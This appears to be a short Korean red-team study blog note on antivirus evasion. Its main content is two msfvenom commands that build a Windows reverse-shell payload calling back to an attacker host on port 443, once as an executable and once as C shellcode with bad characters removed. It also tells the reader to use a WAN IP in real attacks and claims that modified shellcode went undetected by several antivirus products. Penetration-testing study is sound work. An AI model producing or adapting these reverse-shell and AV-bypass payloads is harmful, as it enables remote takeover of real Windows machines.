Pentesting & RedTeam 도서관/레드팀 스터디

RedTeam Note [av_bypass]

0x00 2023. 5. 25. 14:05

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.52.130 LPORT=443 -f exe > /home/kali/Desktop/av_test.exe

host 는 우선 내부 아이피 로 적었다  <- 실전에 사용할때는 wan IP address 로 사용하면 됩니다.
port number 443 은 https  포트인거 같다 file format은 exe 실행파일로 되어있다 revserse_tcp 로 만든다.


msfvenom&nbsp; revserse_shell nomal file

 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.52.130 LPORT=443 -f c -b \x00\x0a\x0d

ipaddress 와 port 을 set 해주고 format 은 c 언어 로 했다 그리고 원활한 shellcode 을 실행하기 위해서 

bed char 을 설정해주었다

msfvenom opt
msfvenom 으로 나온&nbsp; shellcode 을 가지고 조금 수정을 거쳤다 (bypass ) 을 하기위해

 

 

여러 바이러스 백신 이 탐지 을 못하는것을 볼수있다.